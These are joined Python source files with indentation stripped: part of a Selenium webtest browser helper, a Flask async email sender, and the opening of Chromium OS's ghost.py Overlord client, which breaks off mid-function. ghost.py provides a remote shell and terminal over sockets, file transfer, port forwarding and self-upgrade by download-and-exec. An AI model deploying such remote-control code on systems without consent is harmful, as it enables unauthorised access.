) % (str(self), ''.join(expr).strip(';'))
try:
return self.browser.getEval(script)
except RuntimeError:
raise RuntimeError(script)
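# Usage sketch (illustrative): element.eval('e.tagName') returns the
# tag name of the matched node; element.eval('e.childNodes.length')
# returns its number of child nodes.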
def __contains__(self, s):
if isinstance(s, Element):
s = s.html()
return s in self.html()
def __nonzero__(self):
return self.exist()
__bool__ = __nonzero__
def __repr__(self):
return '<%s at %s>' % (self.__class__.__name__, self.locator)
def __str__(self):
return str(self.locator.replace('"', "'"))
class Document(object):
"""The browser document. ``resp.doc.myid`` is egual to
``resp.doc.css('#myid')``"""
def __init__(self, resp):
self.resp = resp
def __getattr__(self, attr):
return Element(self.resp, 'css=#%s' % attr)
def get(self, tag, **kwargs):
"""Return an element matching ``tag``, an ``attribute`` and an
``index``. For example::
resp.doc.get('input', name='go') => xpath=//input[@name="go"]
resp.doc.get('li', description='Item') => xpath=//li[.="Item"]
"""
locator = _eval_xpath(tag, **kwargs)
return Element(self.resp, locator)
def xpath(self, path):
"""Get an :class:`~webtest.browser.Element` using xpath"""
return Element(self.resp, 'xpath=%s' % path)
def css(self, selector):
"""Get an :class:`~webtest.browser.Element` using a css selector"""
return Element(self.resp, 'css=%s' % selector)
def link(self, description=None, linkid=None, href=None, index=None):
"""Get a link"""
return self.get('a', description=description, id=linkid,
href=href, index=index)
def input(self, value=None, name=None, inputid=None, index=None):
"""Get an input field"""
return self.get('input', id=inputid,
value=value, name=name, index=index)
def button(self, description=None, buttonid=None, index=None):
"""Get a button"""
return self.get('button', description=description,
id=buttonid, index=index)
def __contains__(self, s):
if isinstance(s, Element):
return s.exist()
return self.resp.browser.isTextPresent(_get_value(s))
def __call__(self, locator):
return Element(self.resp, locator)
###########
# Forms
###########
class Field(testapp.Field, Element):
classes = {}
def __init__(self, *args, **kwargs):
super(Field, self).__init__(*args, **kwargs)
self.browser = self.form.browser
self.options = []
self.selectedIndices = []
self._forced_values = []
self.locator = _eval_xpath(self.tag,
locator=self.form.locator,
name=self.name)
value = property(Element.value__get, Element.value__set)
class Select(Field):
"""Field representing ``<select>``"""
def force_value(self, value):
self.select('value=%s' % value)
def value__set(self, value):
self.select('value=%s' % value)
def value__get(self):
return self.getSelectedValue()
value = property(value__get, value__set)
Field.classes['select'] = Select
class MultipleSelect(Field):
"""Field representing ``<select multiple="multiple">``"""
def force_value(self, values):
self.removeAllSelections()
str_values = [testapp._stringify(value) for value in values]
for v in str_values:
self.addSelection('value=%s' % v)
def value__set(self, values):
self.removeAllSelections()
str_values = [testapp._stringify(value) for value in values]
for v in str_values:
self.addSelection('value=%s' % v)
def value__get(self):
value = self.getSelectedValues()
return value.split(',')
value = property(value__get, value__set)
Field.classes['multiple_select'] = MultipleSelect
class Radio(Field):
"""Field representing ``<input type="radio">``"""
def value__set(self, value):
if value:
self.check()
else:
self.uncheck()
def value__get(self):
script = r"""(function(obj) {
var name = '%s';
var element = obj.browserbot.findElement('%s');
var elements = element.getElementsByTagName('input');
var values = [];
for (var i = 0, n = elements.length; i < n; ++i) {
element = elements[i];
if (element.name == name && element.checked) {
values.push('name='+element.value);
}
}
return values.join('&');
}(this))""" % (self.name, self.form.locator)
value = self.browser.getEval(script)
# getEval returns a query string like 'name=v1&name=v2'; parse it
value = [v for k, v in cgi.parse_qsl(value)]
if not value:
return None
elif len(value) == 1:
return value[0]
raise ValueError(
'Got more than one value for %r: %s' % (self, value))
value = property(value__get, value__set)
Field.classes['radio'] = Radio
class Checkbox(Radio):
"""Field representing ``<input type="checkbox">``"""
Field.classes['checkbox'] = Checkbox
class Text(Field):
"""Field representing ``<input type="text">``"""
Field.classes['text'] = Text
class File(Field):
"""Field representing ``<input type="file">``"""
def _run_server(self, filename):
"""Run a simple server in a separate thread"""
ip, port = _free_port()
def run():
FileHandler.filename = filename
server = HTTPServer((ip, port), FileHandler)
server.handle_request()
thread = threading.Thread(target=run)
thread.start()
return 'http://%s:%s/' % (ip, port)
def value__set(self, value):
if isinstance(value, (list, tuple)) and len(value) == 1:
value = [self.name] + list(value)
test_app = self.form.resp.test_app
file_info = test_app._get_file_info(value)
name, filename, content = file_info
if test_app.has_upload_support:
url = self._run_server(filename)
url += os.path.basename(filename)
self.attachFile(url)
force_value = value__set
value = property(Field.value__get, value__set)
Field.classes['file'] = File
class Textarea(Text):
"""Field representing ``<textarea>``"""
Field.classes['textarea'] = Textarea
class Hidden(Text, testapp.Hidden):
"""Field representing ``<input type="hidden">``"""
Field.classes['hidden'] = Hidden
class Submit(Field, testapp.Submit):
"""Field representing ``<input type="submit">`` and ``<button>``"""
settable = False
def value__get(self):
return None
value = property(value__get)
def value_if_submitted(self):
return self._value
Field.classes['submit'] = Submit
Field.classes['button'] = Submit
Field.classes['image'] = Submit
class Forms(object):
def __init__(self, resp):
self.resp = resp
def __getitem__(self, key):
return Form(self.resp, key)
class Form(testapp.Form, Element):
"""See :class:`~webtest.Form`"""
FieldClass = Field
def __init__(self, resp, id):
self.resp = resp
self.test_app = resp.test_app
self.browser = resp.browser
if isinstance(id, int):
self.locator = _eval_xpath('form', index=id)
else:
self.locator = _eval_xpath('form', id=id)
if not self:
raise LookupError('No form found at %s' % self.locator)
form = self.eval('e.innerHTML')
super(Form, self).__init__(resp, '<form>%s</form>' % form)
def _parse_fields(self):
super(Form, self)._parse_fields()
# Add index to locators
for name, fields in self.fields.items():
if len(fields) > 1:
for i, field in enumerate(fields):
field.locator += '[%s]' % (i + 1,)
def submit(self, name=None, index=None, extra_environ=None, timeout=None):
"""Submits the form. If ``name`` is given, then also select that
button (using ``index`` to disambiguate).
Returns a :class:`webtest.browser.TestResponse` object.
"""
if timeout != 0:
self.browser.captureNetworkTraffic('json')
self.test_app._make_environ(extra_environ)
if name:
selector = _eval_xpath('input', locator=self.locator,
name=name, index=index)
self.browser.click(selector)
else:
self.browser.submit(self.locator)
return self.test_app._get_response(resp=self.resp, timeout=timeout)
###############
# Servers
###############
class WSGIApplication(object):
"""A WSGI middleware to handle special calls used to run a test app"""
def __init__(self, app, bind):
self.app = app
self.serve_forever = True
self.bind = bind
self.url = 'http://%s:%s/' % bind
self.thread = None
def __call__(self, environ, start_response):
if '__kill_application__' in environ['PATH_INFO']:
self.serve_forever = False
resp = webob.Response()
return resp(environ, start_response)
elif '__file__' in environ['PATH_INFO']:
req = webob.Request(environ)
resp = webob.Response()
resp.content_type = 'text/html; charset=UTF-8'
filename = req.params.get('__file__')
body = open(filename).read()
body = body.replace('http://localhost/',
'http://%s/' % req.host)
if PY3:
resp.text = body
else:
resp.body = body
return resp(environ, start_response)
elif '__application__' in environ['PATH_INFO']:
resp = webob.Response()
return resp(environ, start_response)
return self.app(environ, start_response)
def __repr__(self):
return '<WSGIApplication %r at %s>' % (self.app, self.url)
class WSGIRequestHandler(simple_server.WSGIRequestHandler):
"""A WSGIRequestHandler who log to a logger"""
def log_message(self, format, *args):
log.debug("%s - - [%s] %s" %
(self.address_string(),
self.log_date_time_string(),
format % args))
class WSGIServer(simple_server.WSGIServer):
"""A WSGIServer"""
def serve_forever(self):
while self.application.serve_forever:
self.handle_request()
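# Added note (not in the original): WSGIApplication.__call__ above flips
# ``serve_forever`` to False when the request path contains
# ``__kill_application__``, so this loop exits right after a test client
# fetches e.g. ``http://host:port/__kill_application__``.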
class FileHandler(SimpleHTTPRequestHandler):
"""Handle a simple file"""
def translate_path(self, path):
return self.filename
def log_message(self, format, *args):
log.debug("%s - - [%s] %s\n" %
(self.address_string(),
self.log_date_time_string(),
format % args))
###############
# Misc
###############
def _get_value(s):
if json:
return json.dumps(s)
else:
return repr(str(s))
def _get_command(cmd):
if '_' in cmd:
cmd = cmd.split('_')
cmd = [cmd.pop(0)] + [c.title() for c in cmd]
cmd = ''.join(cmd)
return cmd
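# Added minimal sketch: _get_command maps pythonic snake_case names onto
# Selenium's camelCase commands; names without underscores pass through.
assert _get_command('fire_event') == 'fireEvent'
assert _get_command('is_element_present') == 'isElementPresent'
assert _get_command('click') == 'click'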
def _eval_xpath(tag, locator=None, index=None, **kwargs):
if not locator:
locator = 'xpath='
locator += "//%s" % tag
for k, v in kwargs.items():
if k in ('for_', 'class_'):
k = k.strip('_')
if v:
if k == 'description':
locator += '[.="%s"]' % v
else:
locator += '[@%s="%s"]' % (k, v)
if index is not None:
locator += '[%s]' % (index + 1,)
return locator
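# Added minimal sketch: the locators _eval_xpath produces for the examples
# given in Document.get's docstring.
assert _eval_xpath('input', name='go') == 'xpath=//input[@name="go"]'
assert _eval_xpath('li', description='Item') == 'xpath=//li[.="Item"]'
assert _eval_xpath('form', index=0) == 'xpath=//form[1]'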
def _free_port():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('', 0))
ip, port = s.getsockname()
s.close()
ip = os.environ.get('SELENIUM_BIND', '127.0.0.1')
return ip, port
def is_available():
"""return True if the selenium module is available and a RC server is
running"""
if not json:
warnings.warn(
('selenium is not available because no json module is '
'available. Consider installing simplejson'),
SeleniumWarning)
host = os.environ.get('SELENIUM_HOST', '127.0.0.1')
port = int(os.environ.get('SELENIUM_PORT', 4444))
try:
conn = HTTPConnection(host, port)
conn.request('GET', '/')
except socket.error:
if 'SELENIUM_JAR' not in os.environ:
return False
else:
jar = os.environ['SELENIUM_JAR']
p = subprocess.Popen(['java', '-jar', jar])
os.environ['SELENIUM_PID'] = str(p.pid)
for i in range(30):
time.sleep(.3)
try:
conn = HTTPConnection(host, port)
conn.request('GET', '/')
except socket.error:
pass
else:
return True
return False
return True
|
email.py | from threading import Thread
from flask import current_app, render_template
from flask_mail import Message
from . import mail
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(to, subject, template, **kwargs):
app = current_app._get_current_object()
msg = Message(subject=app.config['FLASKY_MAIL_SUBJECT_PREFIX'] + ' ' + subject,
sender=app.config['FLASKY_MAIL_SENDER'],
recipients=[to])
msg.body = render_template(template + '.txt', **kwargs)
msg.html = render_template(template + '.html', **kwargs)
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
return thr |
ghost.py | #!/usr/bin/env python
# Copyright 2015 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from __future__ import print_function
import argparse
import contextlib
import ctypes
import ctypes.util
import fcntl
import hashlib
import json
import logging
import os
import platform
import Queue
import re
import select
import signal
import socket
import ssl
import struct
import subprocess
import sys
import termios
import threading
import time
import traceback
import tty
import urllib2
import uuid
import jsonrpclib
from jsonrpclib.SimpleJSONRPCServer import SimpleJSONRPCServer
_GHOST_RPC_PORT = int(os.getenv('GHOST_RPC_PORT', 4499))
_OVERLORD_PORT = int(os.getenv('OVERLORD_PORT', 4455))
_OVERLORD_LAN_DISCOVERY_PORT = int(os.getenv('OVERLORD_LD_PORT', 4456))
_OVERLORD_HTTP_PORT = int(os.getenv('OVERLORD_HTTP_PORT', 9000))
_BUFSIZE = 8192
_RETRY_INTERVAL = 2
_SEPARATOR = '\r\n'
_PING_TIMEOUT = 3
_PING_INTERVAL = 5
_REQUEST_TIMEOUT_SECS = 60
_SHELL = os.getenv('SHELL', '/bin/bash')
_DEFAULT_BIND_ADDRESS = 'localhost'
_CONTROL_START = 128
_CONTROL_END = 129
_BLOCK_SIZE = 4096
_CONNECT_TIMEOUT = 3
# Stream control
_STDIN_CLOSED = '##STDIN_CLOSED##'
SUCCESS = 'success'
FAILED = 'failed'
DISCONNECTED = 'disconnected'
class PingTimeoutError(Exception):
pass
class RequestError(Exception):
pass
class BufferedSocket(object):
"""A buffered socket that supports unrecv.
Allows putting data back into the socket buffer so the next recv() call
returns it first.
"""
def __init__(self, sock):
self.sock = sock
self._buf = ''
def fileno(self):
return self.sock.fileno()
def Recv(self, bufsize, flags=0):
if self._buf:
if len(self._buf) >= bufsize:
ret = self._buf[:bufsize]
self._buf = self._buf[bufsize:]
return ret
else:
ret = self._buf
self._buf = ''
return ret + self.sock.recv(bufsize - len(ret), flags)
else:
return self.sock.recv(bufsize, flags)
def UnRecv(self, buf):
self._buf = buf + self._buf
def Send(self, *args, **kwargs):
return self.sock.send(*args, **kwargs)
def RecvBuf(self):
"""Only recive from buffer."""
ret = self._buf
self._buf = ''
return ret
def Close(self):
self.sock.close()
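# Added illustrative sketch (not part of the original file): UnRecv pushes
# bytes back so the next Recv returns them first. Ghost.ParseMessage below
# relies on this to hold on to a partial message that has not yet seen its
# _SEPARATOR. The socketpair is only a stand-in transport, and we assume the
# whole demo payload arrives in one recv, which holds for a local socketpair.
def _DemoBufferedSocket():
  a, b = socket.socketpair()
  bsock = BufferedSocket(a)
  b.send('{"name": "ping"}' + _SEPARATOR + '{"na')
  data = bsock.Recv(_BUFSIZE)
  complete, partial = data.split(_SEPARATOR, 1)
  assert complete == '{"name": "ping"}'
  bsock.UnRecv(partial)  # '{"na' goes back into the buffer
  b.send('me": "pong"}' + _SEPARATOR)
  assert bsock.Recv(_BUFSIZE).startswith('{"name": "pong"}')
  bsock.Close()
  b.close()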
class TLSSettings(object):
def __init__(self, tls_cert_file, verify):
"""Constructor.
Args:
tls_cert_file: TLS certificate in PEM format.
verify: whether to verify the server certificate.
"""
self._enabled = False
self._tls_cert_file = tls_cert_file
self._verify = verify
self._tls_context = None
def _UpdateContext(self):
if not self._enabled:
self._tls_context = None
return
self._tls_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
self._tls_context.verify_mode = ssl.CERT_REQUIRED
if self._verify:
if self._tls_cert_file:
self._tls_context.check_hostname = True
try:
self._tls_context.load_verify_locations(self._tls_cert_file)
logging.info('TLSSettings: using user-supplied ca-certificate')
except IOError as e:
logging.error('TLSSettings: %s: %s', self._tls_cert_file, e)
sys.exit(1)
else:
self._tls_context = ssl.create_default_context(ssl.Purpose.SERVER_AUTH)
logging.info('TLSSettings: using built-in ca-certificates')
else:
self._tls_context.verify_mode = ssl.CERT_NONE
logging.info('TLSSettings: skipping TLS verification!!!')
def SetEnabled(self, enabled):
logging.info('TLSSettings: enabled: %s', enabled)
if self._enabled != enabled:
self._enabled = enabled
self._UpdateContext()
def Enabled(self):
return self._enabled
def Context(self):
return self._tls_context
class Ghost(object):
"""Ghost implements the client protocol of Overlord.
Ghost provides terminal/shell/logcat functionality and manages the
client-side connectivity.
"""
NONE, AGENT, TERMINAL, SHELL, LOGCAT, FILE, FORWARD = range(7)
MODE_NAME = {
NONE: 'NONE',
AGENT: 'Agent',
TERMINAL: 'Terminal',
SHELL: 'Shell',
LOGCAT: 'Logcat',
FILE: 'File',
FORWARD: 'Forward'
}
RANDOM_MID = '##random_mid##'
def __init__(self, overlord_addrs, tls_settings=None, mode=AGENT, mid=None,
sid=None, prop_file=None, terminal_sid=None, tty_device=None,
command=None, file_op=None, port=None, tls_mode=None):
"""Constructor.
Args:
overlord_addrs: a list of possible address of overlord.
tls_settings: a TLSSetting object.
mode: client mode, one of AGENT, TERMINAL, SHELL, FILE or FORWARD.
mid: a str to set for machine ID. If mid equals Ghost.RANDOM_MID, machine
id is randomly generated.
sid: session ID. If the connection is requested by overlord, sid should
be set to the corresponding session id assigned by overlord.
prop_file: properties file filename.
terminal_sid: the terminal session ID associated with this client. This
is used for file download.
tty_device: the terminal device to open; if tty_device is None, a pseudo
terminal will be opened instead.
command: the command to execute when we are in SHELL mode.
file_op: a tuple (action, filepath, perm). action is either 'download' or
'upload'. perm is the permission to set for the file.
port: port number to forward.
tls_mode: one of True, False or None. If not None, skip TLS detection
and assume the server does (True) or does not (False) use TLS.
"""
assert mode in [Ghost.AGENT, Ghost.TERMINAL, Ghost.SHELL, Ghost.FILE,
Ghost.FORWARD]
if mode == Ghost.SHELL:
assert command is not None
if mode == Ghost.FILE:
assert file_op is not None
self._platform = platform.system()
self._overlord_addrs = overlord_addrs
self._connected_addr = None
self._tls_settings = tls_settings
self._mid = mid
self._sock = None
self._mode = mode
self._machine_id = self.GetMachineID()
self._session_id = sid if sid is not None else str(uuid.uuid4())
self._terminal_session_id = terminal_sid
self._ttyname_to_sid = {}
self._terminal_sid_to_pid = {}
self._prop_file = prop_file
self._properties = {}
self._register_status = DISCONNECTED
self._reset = threading.Event()
self._tls_mode = tls_mode
# RPC
self._requests = {}
self._queue = Queue.Queue()
# Protocol specific
self._last_ping = 0
self._tty_device = tty_device
self._shell_command = command
self._file_op = file_op
self._download_queue = Queue.Queue()
self._port = port
def SetIgnoreChild(self, status):
# Only ignore child for Agent since only it could spawn child Ghost.
if self._mode == Ghost.AGENT:
signal.signal(signal.SIGCHLD,
signal.SIG_IGN if status else signal.SIG_DFL)
def GetFileSha1(self, filename):
with open(filename, 'r') as f:
return hashlib.sha1(f.read()).hexdigest()
def TLSEnabled(self, host, port):
"""Determine if TLS is enabled on given server address."""
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
# Allow any certificate since we only want to check if server talks TLS.
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
context.verify_mode = ssl.CERT_NONE
sock = context.wrap_socket(sock, server_hostname=host)
sock.settimeout(_CONNECT_TIMEOUT)
sock.connect((host, port))
return True
except ssl.SSLError:
return False
except socket.error: # Connection refused or timeout
raise
except Exception:
return False # Whatever failed above, assume TLS is not enabled
def Upgrade(self):
logging.info('Upgrade: initiating upgrade sequence...')
try:
https_enabled = self.TLSEnabled(self._connected_addr[0],
_OVERLORD_HTTP_PORT)
except socket.error:
logging.error('Upgrade: failed to connect to Overlord HTTP server, '
'abort')
return
if self._tls_settings.Enabled() and not https_enabled:
logging.error('Upgrade: TLS enforced but found Overlord HTTP server '
'without TLS enabled! Possible mis-configuration or '
'DNS/IP spoofing detected, abort')
return
scriptpath = os.path.abspath(sys.argv[0])
url = 'http%s://%s:%d/upgrade/ghost.py' % (
's' if https_enabled else '', self._connected_addr[0],
_OVERLORD_HTTP_PORT)
# Download sha1sum for ghost.py for verification
try:
with contextlib.closing(
urllib2.urlopen(url + '.sha1', timeout=_CONNECT_TIMEOUT,
context=self._tls_settings.Context())) as f:
if f.getcode() != 200:
raise RuntimeError('HTTP status %d' % f.getcode())
sha1sum = f.read().strip()
except (ssl.SSLError, ssl.CertificateError) as e:
logging.error('Upgrade: %s: %s', e.__class__.__name__, e)
return
except Exception:
logging.error('Upgrade: failed to download sha1sum file, abort')
return
if self.GetFileSha1(scriptpath) == sha1sum:
logging.info('Upgrade: ghost is already up-to-date, skipping upgrade')
return
# Download upgrade version of ghost.py
try:
with contextlib.closing(
urllib2.urlopen(url, timeout=_CONNECT_TIMEOUT,
context=self._tls_settings.Context())) as f:
if f.getcode() != 200:
raise RuntimeError('HTTP status %d' % f.getcode())
data = f.read()
except (ssl.SSLError, ssl.CertificateError) as e:
logging.error('Upgrade: %s: %s', e.__class__.__name__, e)
return
except Exception:
logging.error('Upgrade: failed to download upgrade, abort')
return
# Compare SHA1 sum
if hashlib.sha1(data).hexdigest() != sha1sum:
logging.error('Upgrade: sha1sum mismatch, abort')
return
try:
with open(scriptpath, 'w') as f:
f.write(data)
except Exception:
logging.error('Upgrade: failed to write upgrade onto disk, abort')
return
logging.info('Upgrade: restarting ghost...')
self.CloseSockets()
self.SetIgnoreChild(False)
os.execve(scriptpath, [scriptpath] + sys.argv[1:], os.environ)
def LoadProperties(self):
try:
if self._prop_file:
with open(self._prop_file, 'r') as f:
self._properties = json.loads(f.read())
except Exception as e:
logging.error('LoadProperties: ' + str(e))
def CloseSockets(self):
# Close sockets opened by the parent process, since we don't use them
# anymore.
if self._platform == 'Linux':
for fd in os.listdir('/proc/self/fd/'):
try:
real_fd = os.readlink('/proc/self/fd/%s' % fd)
if real_fd.startswith('socket'):
os.close(int(fd))
except Exception:
pass
def SpawnGhost(self, mode, sid=None, terminal_sid=None, tty_device=None,
command=None, file_op=None, port=None):
"""Spawn a child ghost with specific mode.
Returns:
The spawned child process pid.
"""
# Restore the default signal handler, so our child won't have problems.
self.SetIgnoreChild(False)
pid = os.fork()
if pid == 0:
self.CloseSockets()
g = Ghost([self._connected_addr], tls_settings=self._tls_settings,
mode=mode, mid=Ghost.RANDOM_MID, sid=sid,
terminal_sid=terminal_sid, tty_device=tty_device,
command=command, file_op=file_op, port=port)
g.Start()
sys.exit(0)
else:
self.SetIgnoreChild(True)
return pid
def Timestamp(self):
return int(time.time())
def GetGateWayIP(self):
if self._platform == 'Darwin':
output = subprocess.check_output(['route', '-n', 'get', 'default'])
ret = re.search('gateway: (.*)', output)
if ret:
return [ret.group(1)]
elif self._platform == 'Linux':
with open('/proc/net/route', 'r') as f:
lines = f.readlines()
ips = []
for line in lines:
parts = line.split('\t')
if parts[2] == '00000000':
continue
try:
# /proc/net/route stores the gateway as little-endian hex, so reverse
# the decoded bytes to get dotted-quad order.
h = parts[2].decode('hex')
ips.append('%d.%d.%d.%d' % tuple(ord(x) for x in reversed(h)))
except TypeError:
pass
return ips
else:
logging.warning('GetGateWayIP: unsupported platform')
return []
def GetFactoryServerIP(self):
try:
import factory_common # pylint: disable=unused-variable
from cros.factory.test import server_proxy
url = server_proxy.GetServerURL()
match = re.match(r'^https?://(.*):.*$', url)
if match:
return [match.group(1)]
except Exception:
pass
return []
def GetMachineID(self):
"""Generates machine-dependent ID string for a machine.
There are many ways to generate a machine ID:
Linux:
1. factory device_id
2. /sys/class/dmi/id/product_uuid (only available on intel machines)
3. MAC address
We follow the listed order to generate the machine ID, and fall back to the
next alternative if the previous doesn't work.
Darwin:
All Darwin systems should have the IOPlatformSerialNumber attribute.
"""
if self._mid == Ghost.RANDOM_MID:
return str(uuid.uuid4())
elif self._mid:
return self._mid
# Darwin
if self._platform == 'Darwin':
output = subprocess.check_output(['ioreg', '-rd1', '-c',
'IOPlatformExpertDevice'])
ret = re.search('"IOPlatformSerialNumber" = "(.*)"', output)
if ret:
return ret.group(1)
# Try factory device id
try:
import factory_common # pylint: disable=unused-variable
from cros.factory.test import testlog_goofy
return testlog_goofy.GetDeviceID()
except Exception:
pass
# Try DMI product UUID
try:
with open('/sys/class/dmi/id/product_uuid', 'r') as f:
return f.read().strip()
except Exception:
pass
# Fall back to MAC addresses if none of the above is available
try:
macs = []
ifaces = sorted(os.listdir('/sys/class/net'))
for iface in ifaces:
if iface == 'lo':
continue
with open('/sys/class/net/%s/address' % iface, 'r') as f:
macs.append(f.read().strip())
return ';'.join(macs)
except Exception:
pass
raise RuntimeError("can't generate machine ID")
def GetProcessWorkingDirectory(self, pid):
if self._platform == 'Linux':
return os.readlink('/proc/%d/cwd' % pid)
elif self._platform == 'Darwin':
PROC_PIDVNODEPATHINFO = 9
proc_vnodepathinfo_size = 2352
vid_path_offset = 152
proc = ctypes.cdll.LoadLibrary(ctypes.util.find_library('libproc'))
buf = ctypes.create_string_buffer('\0' * proc_vnodepathinfo_size)
proc.proc_pidinfo(pid, PROC_PIDVNODEPATHINFO, 0,
ctypes.byref(buf), proc_vnodepathinfo_size)
buf = buf.raw[vid_path_offset:]
n = buf.index('\0')
return buf[:n]
else:
raise RuntimeError('GetProcessWorkingDirectory: unsupported platform')
def Reset(self):
"""Reset state and clear request handlers."""
if self._sock is not None:
self._sock.Close()
self._sock = None
self._reset.clear()
self._last_ping = 0
self._requests = {}
self.LoadProperties()
self._register_status = DISCONNECTED
def SendMessage(self, msg):
"""Serialize the message and send it through the socket."""
self._sock.Send(json.dumps(msg) + _SEPARATOR)
def SendRequest(self, name, args, handler=None,
timeout=_REQUEST_TIMEOUT_SECS):
if handler and not callable(handler):
raise RequestError('Invalid request handler for msg "%s"' % name)
rid = str(uuid.uuid4())
msg = {'rid': rid, 'timeout': timeout, 'name': name, 'params': args}
if timeout >= 0:
self._requests[rid] = [self.Timestamp(), timeout, handler]
self.SendMessage(msg)
def SendResponse(self, omsg, status, params=None):
msg = {'rid': omsg['rid'], 'response': status, 'params': params}
self.SendMessage(msg)
def HandleTTYControl(self, fd, control_str):
msg = json.loads(control_str)
command = msg['command']
params = msg['params']
if command == 'resize':
# malformed resize request; some error happened on the websocket side
if len(params) != 2:
return
winsize = struct.pack('HHHH', params[0], params[1], 0, 0)
fcntl.ioctl(fd, termios.TIOCSWINSZ, winsize)
else:
logging.warning('Invalid request command "%s"', command)
def SpawnTTYServer(self, unused_var):
"""Spawn a TTY server and forward I/O to the TCP socket."""
logging.info('SpawnTTYServer: started')
try:
if self._tty_device is None:
pid, fd = os.forkpty()
if pid == 0:
ttyname = os.ttyname(sys.stdout.fileno())
try:
server = GhostRPCServer()
server.RegisterTTY(self._session_id, ttyname)
server.RegisterSession(self._session_id, os.getpid())
except Exception:
# If ghost is launched without RPC server, the call will fail but we
# can ignore it.
pass
# The directory that contains the currently running ghost script
script_dir = os.path.dirname(os.path.abspath(sys.argv[0]))
env = os.environ.copy()
env['USER'] = os.getenv('USER', 'root')
env['HOME'] = os.getenv('HOME', '/root')
env['PATH'] = os.getenv('PATH') + ':%s' % script_dir
os.chdir(env['HOME'])
os.execve(_SHELL, [_SHELL], env)
else:
fd = os.open(self._tty_device, os.O_RDWR)
tty.setraw(fd)
attr = termios.tcgetattr(fd)
attr[0] &= ~(termios.IXON | termios.IXOFF)
attr[2] |= termios.CLOCAL
attr[2] &= ~termios.CRTSCTS
attr[4] = termios.B115200
attr[5] = termios.B115200
termios.tcsetattr(fd, termios.TCSANOW, attr)
nonlocals = {'control_state': None, 'control_str': ''}
def _ProcessBuffer(buf):
write_buffer = ''
while buf:
if nonlocals['control_state']:
if chr(_CONTROL_END) in buf:
index = buf.index(chr(_CONTROL_END))
nonlocals['control_str'] += buf[:index]
self.HandleTTYControl(fd, nonlocals['control_str'])
nonlocals['control_state'] = None
nonlocals['control_str'] = ''
buf = buf[index+1:]
else:
nonlocals['control_str'] += buf
buf = ''
else:
if chr(_CONTROL_START) in buf:
nonlocals['control_state'] = _CONTROL_START
index = buf.index(chr(_CONTROL_START))
write_buffer += buf[:index]
buf = buf[index+1:]
else:
write_buffer += buf
buf = ''
if write_buffer:
os.write(fd, write_buffer)
_ProcessBuffer(self._sock.RecvBuf())
while True:
rd, unused_wd, unused_xd = select.select([self._sock, fd], [], [])
if fd in rd:
self._sock.Send(os.read(fd, _BUFSIZE))
if self._sock in rd:
buf = self._sock.Recv(_BUFSIZE)
if not buf:
raise RuntimeError('connection terminated')
_ProcessBuffer(buf)
except Exception as e:
logging.error('SpawnTTYServer: %s', e)
finally:
self._sock.Close()
logging.info('SpawnTTYServer: terminated')
sys.exit(0)
def SpawnShellServer(self, unused_var):
"""Spawn a shell server and forward input/output from/to the TCP socket."""
logging.info('SpawnShellServer: started')
# Add ghost executable to PATH
script_dir = os.path.dirname(os.path.abspath(sys.argv[0]))
env = os.environ.copy()
env['PATH'] = '%s:%s' % (script_dir, os.getenv('PATH'))
# Execute shell command from HOME directory
os.chdir(os.getenv('HOME', '/tmp'))
p = subprocess.Popen(self._shell_command, stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
shell=True, env=env)
def make_non_block(fd):
fl = fcntl.fcntl(fd, fcntl.F_GETFL)
fcntl.fcntl(fd, fcntl.F_SETFL, fl | os.O_NONBLOCK)
make_non_block(p.stdout)
make_non_block(p.stderr)
try:
p.stdin.write(self._sock.RecvBuf())
while True:
rd, unused_wd, unused_xd = select.select(
[p.stdout, p.stderr, self._sock], [], [])
if p.stdout in rd:
self._sock.Send(p.stdout.read(_BUFSIZE))
if p.stderr in rd:
self._sock.Send(p.stderr.read(_BUFSIZE))
if self._sock in rd:
ret = self._sock.Recv(_BUFSIZE)
if not ret:
raise RuntimeError('connection terminated')
try:
idx = ret.index(_STDIN_CLOSED * 2)
p.stdin.write(ret[:idx])
p.stdin.close()
except ValueError:
p.stdin.write(ret)
p.poll()
if p.returncode is not None:
break
except Exception as e:
logging.error('SpawnShellServer: %s', e)
finally:
# Check if the process has terminated. If not, send SIGTERM, wait one
# second, then send SIGKILL to make sure the process is terminated.
p.poll()
if p.returncode is None:
try:
p.terminate()
time.sleep(1)
p.kill()
except Exception:
pass
p.wait()
self._sock.Close()
logging.info('SpawnShellServer: terminated')
sys.exit(0)
def InitiateFileOperation(self, unused_var):
if self._file_op[0] == 'download':
try:
size = os.stat(self._file_op[1]).st_size
except OSError as e:
logging.error('InitiateFileOperation: download: %s', e)
sys.exit(1)
self.SendRequest('request_to_download',
{'terminal_sid': self._terminal_session_id,
'filename': os.path.basename(self._file_op[1]),
'size': size})
elif self._file_op[0] == 'upload':
self.SendRequest('clear_to_upload', {}, timeout=-1)
self.StartUploadServer()
else:
logging.error('InitiateFileOperation: unknown file operation, ignored')
def StartDownloadServer(self):
logging.info('StartDownloadServer: started')
try:
with open(self._file_op[1], 'rb') as f:
while True:
data = f.read(_BLOCK_SIZE)
if not data:
break
self._sock.Send(data)
except Exception as e:
logging.error('StartDownloadServer: %s', e)
finally:
self._sock.Close()
logging.info('StartDownloadServer: terminated')
sys.exit(0)
def StartUploadServer(self):
logging.info('StartUploadServer: started')
try:
filepath = self._file_op[1]
dirname = os.path.dirname(filepath)
if not os.path.exists(dirname):
try:
os.makedirs(dirname)
except Exception:
pass
with open(filepath, 'wb') as f:
if self._file_op[2]:
os.fchmod(f.fileno(), self._file_op[2])
f.write(self._sock.RecvBuf())
while True:
rd, unused_wd, unused_xd = select.select([self._sock], [], [])
if self._sock in rd:
buf = self._sock.Recv(_BLOCK_SIZE)
if not buf:
break
f.write(buf)
except socket.error as e:
logging.error('StartUploadServer: socket error: %s', e)
except Exception as e:
logging.error('StartUploadServer: %s', e)
finally:
self._sock.Close()
logging.info('StartUploadServer: terminated')
sys.exit(0)
def SpawnPortForwardServer(self, unused_var):
"""Spawn a port forwarding server and forward I/O to the TCP socket."""
logging.info('SpawnPortForwardServer: started')
src_sock = None
try:
src_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
